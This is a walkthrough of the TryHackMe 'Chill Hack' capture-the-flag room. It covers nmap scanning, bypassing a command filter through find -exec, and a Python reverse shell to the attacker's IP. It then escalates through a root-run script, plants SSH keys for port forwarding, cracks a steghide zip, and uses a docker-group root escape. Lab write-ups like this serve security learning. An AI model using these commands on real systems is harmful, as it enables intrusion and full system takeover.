Chill Hack

TryHackMe | Chill Hack

First let’s run nmap.

Nmap scan report for 10.10.102.170
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.13.24.61
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09f95db918d0b23a822d6e768cc20144 (RSA)
|   256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_  256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EEEA719D1DF55D478C68D9886707F17
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.69 seconds

Since we have a webserver let’s view the site.

I’ll also search for directories using Gobuster.

While that was running I noticed anonymous FTP login on nmap. I checked it out and I found note.txt and read the contents. What command is Apaar referring to?

Let’s check robots.txt. Nothing notable.

I found /secret from my Gobuster scan so I’ll check that out. Looks like I can enter commands. Unacceptable commands are met with an alert. Is this what Apaar was referring to?

Acceptable commands are met with a cute little worker and gives us results for ‘whoami’.

So the commands are filtered but banned commands can still be used with an escape ‘\’. We get some listings.

The ‘find’ command is acceptable. I wonder if I can append other commands to the allowed command.

I’ll try adding a reverse shell to the find command as shown below.

find /usr/bin/python3 -exec {} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.24.61",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;

I set up a listener and receive a shell!

I appears I am viewing the files for the website. Based on index.php there are many commands that are blacklisted.

Let’s see if I can escalate my privileges. There’s a script called helpline that I can run as root.

Let’s view the script.

If not properly filtered I could inject a command and escalate privileges. Inserting /bin/bash allows us to switch to the apaar user.

Let’s look around. We see a find and it happens to contain our first flag!

I can’t seem to move around so I will need to escalate privileges.

I ran Linpeas.

I see a ports 3306, 9001 that can only be accessed locally. Let’s try port forwarding. Since we have all privileges to the .ssh directory I can create my own keys and add the public key to ‘authorized_keys’.

Now I can do a port forward for 9001.

Now I can see another website on port 9901.

Looking around I found the second website’s files.

Looking at the account.php we can see that the script performs raw SQL queries without doing any proper filtering or sanitization on user input.

I found credentials in the website’s code.

There’s also a clue in hacker.php.

Since it relates to hacker-with-laptop_23–2147985341.jpg let’s take a closer look.

Running steghide gives me ‘backup.zip’.

It is password-protected so I will try to crack it with john. Now I have a password.

Let’s check out the file.

I found a credential for Anurodh. It appears to be base64 encoded.

Decoding it gives us a password!

Now I can switch to Anurodh and see what privileges they have.

They are part of the docker group. Checking Gtfobins I see the following command I could run to gain root privileges.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Now I am root! The only file is proof.txt. Surely this is our flag.

And there it is!